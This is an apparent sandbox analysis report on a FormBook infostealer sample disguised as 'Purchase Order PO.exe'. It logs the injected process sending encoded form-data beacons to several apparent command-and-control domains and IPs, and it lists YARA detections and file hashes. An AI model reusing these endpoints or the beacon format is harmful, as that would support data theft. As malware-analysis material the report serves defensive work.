                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
Nov 22, 2024 15:14:17.012943029 CET | 224 | IN
                                                                                                                          Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 50040 | 209.74.77.107 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:14:22.778987885 CET | 639 | OUT | POST /fbpt/ HTTP/1.1
                                                                                                                          Host: www.beyondfitness.live
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.beyondfitness.live
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.beyondfitness.live/fbpt/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=hF42VS9OEqvX3julElbxkE80MbdvLBeyK0juN8r0Tv6un4uXhSOSi9mZZ8bbOaj2Bu8aMOVxXFVKXXU4Nn+h5kshvo3fqpVLCn1huoUP4XyJSweunJ4EC4UWiZu5VpxM4joLfozFK0gO8lpX1B7IzpNw/fdn5/H2gY1T6eXE1Yw6a6uF0Ux11jWqMm09rYqhdA==
Nov 22, 2024 15:14:24.036556959 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:23 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          34 | 192.168.2.4 | 50041 | 209.74.77.107 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:14:25.442375898 CET | 659 | OUT | POST /fbpt/ HTTP/1.1
                                                                                                                          Host: www.beyondfitness.live
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.beyondfitness.live
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.beyondfitness.live/fbpt/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=hF42VS9OEqvX3C+lIjTxsE8zJbdvChe2K0vuN+HdTdOunY+XgTOSl9mZWcbaKajDBuwSML9xXExKXV84OQKurksjjI3R15VLCn1huoAh4XqJSBuulo4HLYUX1pu5G5xI4jpufr3vK2IO8kZXwA7X6pN6y/c39uyuiq8Jy8Tfr7smScjfllQinjyZRh9JmbXoGGhus2/HfAiZQ7CFTS5NdC8=
                                                                                                                          Nov 22, 2024 15:14:26.649337053 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:26 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          35 | 192.168.2.4 | 50042 | 209.74.77.107 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:14:28.102400064 CET | 10741 | OUT | POST /fbpt/ HTTP/1.1
                                                                                                                          Host: www.beyondfitness.live
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.beyondfitness.live
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.beyondfitness.live/fbpt/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:14:29.389961958 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:29 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          36 | 192.168.2.4 | 50043 | 209.74.77.107 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:14:30.770644903 CET | 361 | OUT | GET /fbpt/?Mr60=sHQWWiJRbY7Czg+qExT5lhETHbNnMxamWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw7URZvJro+8N+ASp2jrUizWujex2cueM/JZ0=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.beyondfitness.live
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:14:31.979356050 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:31 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          37 | 192.168.2.4 | 50044 | 77.68.64.45 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:14:37.663618088 CET | 636 | OUT | POST /dm4p/ HTTP/1.1
                                                                                                                          Host: www.dietcoffee.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.dietcoffee.online
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.dietcoffee.online/dm4p/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=qCODU1Ebwnhg6TSnaVpSJhz1mHFgjrvu6lafUU+g0DgZhSmQlMDnJ632oP/6dfaoRn0P6viKy/Mq3W0ChEgnxELsrdt8D35QJICg8M5rafX50rmoOMERc3ir+C0mm86wi99ZUK27w9RJNfIWxY8OEFPUF4Gs/o/Tq0NaD4c62phrart57Iv3nXjhn6lPEe1gHg==
                                                                                                                          Nov 22, 2024 15:14:38.981838942 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.25.3
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:38 GMT
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Encoding: gzip


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          38 | 192.168.2.4 | 50045 | 77.68.64.45 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:14:40.334255934 CET | 656 | OUT | POST /dm4p/ HTTP/1.1
                                                                                                                          Host: www.dietcoffee.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.dietcoffee.online
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.dietcoffee.online/dm4p/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=qCODU1Ebwnhg4zinJmRSIBz273FgoLvi6lWfUV6w0QUZmxyQ39DnI632gv/7Q/avRn4p6rqKy+oq3TYCizMkxUL5qttyMX5QJICg8Io8afP51b2oOtEQf3is2i0m3s6Oi993UJzuw/pJNf4WyKEJTVPoB4HF+42rsEU3CL5erq1Mbtgjq5Og1XHS69s7JdIpctPI16MXjX9XS6lhL4jZ4LQ=
                                                                                                                          Nov 22, 2024 15:14:41.596782923 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.25.3
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:41 GMT
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Encoding: gzip


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          39 | 192.168.2.4 | 50046 | 77.68.64.45 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:14:43.013545990 CET | 10738 | OUT | POST /dm4p/ HTTP/1.1
                                                                                                                          Host: www.dietcoffee.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.dietcoffee.online
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.dietcoffee.online/dm4p/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Nov 22, 2024 15:14:44.365354061 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.25.3
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:44 GMT
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 50047 | 77.68.64.45 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:14:45.674417973 CET | 360 | OUT | GET /dm4p/?o6=SpTPojpx7H&Mr60=nAmjXBwFyC120iWGDF5QEkfQ4V9pq4qW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4A1F2MgfpbEGtSAoSHmNs0Z+rY9P6APqFlZ34= HTTP/1.1
                                                                                                                          Host: www.dietcoffee.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Nov 22, 2024 15:14:46.997927904 CET | 373 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.25.3
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:46 GMT
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Content-Length: 203
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 50048 | 146.88.233.115 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:14:53.440560102 CET | 636 | OUT | POST /qtfx/ HTTP/1.1
                                                                                                                          Host: www.smartcongress.net
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.smartcongress.net
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.smartcongress.net/qtfx/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=HflE8l++v44HtKQzz5+/zGKTzyiXaCjV6BJMpsDV0Mm1smFq8jmIkJJtYDjGMX6rqs2wCrZVWppBwohjxoOvH06efju3JE9hOW5pf9Emi1dH2VOll9VqgjXRrcXqdv2stKl0vl2gWC5rbpCRYk35Oj+5EH54OI845Yg5e/k1TXKGPSJNWgyq3c1UDla/XrZ+6A==
Nov 22, 2024 15:14:55.008775949 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html; charset=iso-8859-1
                                                                                                                          content-length: 196
                                                                                                                          date: Fri, 22 Nov 2024 14:14:54 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          x-tuned-by: N0C
                                                                                                                          connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50049 | 146.88.233.115 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:14:56.102432966 CET | 656 | OUT | POST /qtfx/ HTTP/1.1
                                                                                                                          Host: www.smartcongress.net
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.smartcongress.net
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.smartcongress.net/qtfx/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=HflE8l++v44H/7gz0eS/ymKS/SiXNSic6B1MpoSK0+y1tH1q/mSInJJtQjiCTH6aqsqOCrlVWp9BwpRjyfSsdE6QSDuiWU9hOW5pf9hui2tH2EeljpBtpDXS9MXqZv2gtKlCvnTHWE9rbpyRb134ZT+/a34nOKtOj4RpbMdXS0SZOUEXHRT9lcRneiTLaok3hDsni2/sc/ZZ3jlp9avm8GM=
Nov 22, 2024 15:14:57.406168938 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html; charset=iso-8859-1
                                                                                                                          content-length: 196
                                                                                                                          date: Fri, 22 Nov 2024 14:14:57 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          x-tuned-by: N0C
                                                                                                                          connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50050 | 146.88.233.115 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:14:58.773452997 CET | 10738 | OUT | POST /qtfx/ HTTP/1.1
                                                                                                                          Host: www.smartcongress.net
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.smartcongress.net
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.smartcongress.net/qtfx/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Data Ascii: Mr60= [TRUNCATED]
Nov 22, 2024 15:15:00.164673090 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html; charset=iso-8859-1
                                                                                                                          content-length: 196
                                                                                                                          date: Fri, 22 Nov 2024 14:14:59 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          x-tuned-by: N0C
                                                                                                                          connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 50051 | 146.88.233.115 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:15:01.441237926 CET | 360 | OUT | GET /qtfx/?Mr60=KdNk/QG/ntQJ0Ylt7Lyc3znBwC3jfRDsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLMlSLf1n7d0xHEmolRusqu1Y7m0apztprjxI=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.smartcongress.net
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Nov 22, 2024 15:15:02.766300917 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html; charset=iso-8859-1
                                                                                                                          content-length: 196
                                                                                                                          date: Fri, 22 Nov 2024 14:15:02 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          x-tuned-by: N0C
                                                                                                                          connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                          Target ID:0
                                                                                                                          Start time:09:10:59
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\Purchase Order PO.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order PO.exe"
                                                                                                                          Imagebase:0x710000
                                                                                                                          File size:770'560 bytes
                                                                                                                          MD5 hash:28D64B4CC91C016C93EB28E1F465EFD2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:09:11:04
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\Purchase Order PO.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order PO.exe"
                                                                                                                          Imagebase:0xf60000
                                                                                                                          File size:770'560 bytes
                                                                                                                          MD5 hash:28D64B4CC91C016C93EB28E1F465EFD2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:6
                                                                                                                          Start time:09:11:36
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe"
                                                                                                                          Imagebase:0x600000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:7
                                                                                                                          Start time:09:11:37
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Windows\SysWOW64\isoburn.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                                                                                          Imagebase:0x9c0000
                                                                                                                          File size:107'008 bytes
                                                                                                                          MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:8
                                                                                                                          Start time:09:11:51
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe"
                                                                                                                          Imagebase:0x600000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:9
                                                                                                                          Start time:09:12:04
                                                                                                                          Start date:22/11/2024
                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                          Imagebase:0x7ff6bf500000
                                                                                                                          File size:676'768 bytes
                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:11.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:2.1%
                                                                                                                            Total number of Nodes:190
                                                                                                                            Total number of Limit Nodes:13
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q$,bq$,bq$Hbq
                                                                                                                            • API String ID: 0-56095411
                                                                                                                            • Opcode ID: fd3df31d9ba2f9b2712b510627b3b798a3cfcb762e54e36442a498854f2daf34
                                                                                                                            • Instruction ID: 8981435e177cdc5017f362bd55becceb8cb753912e71f2873f3e4dd965db3832
                                                                                                                            • Opcode Fuzzy Hash: fd3df31d9ba2f9b2712b510627b3b798a3cfcb762e54e36442a498854f2daf34
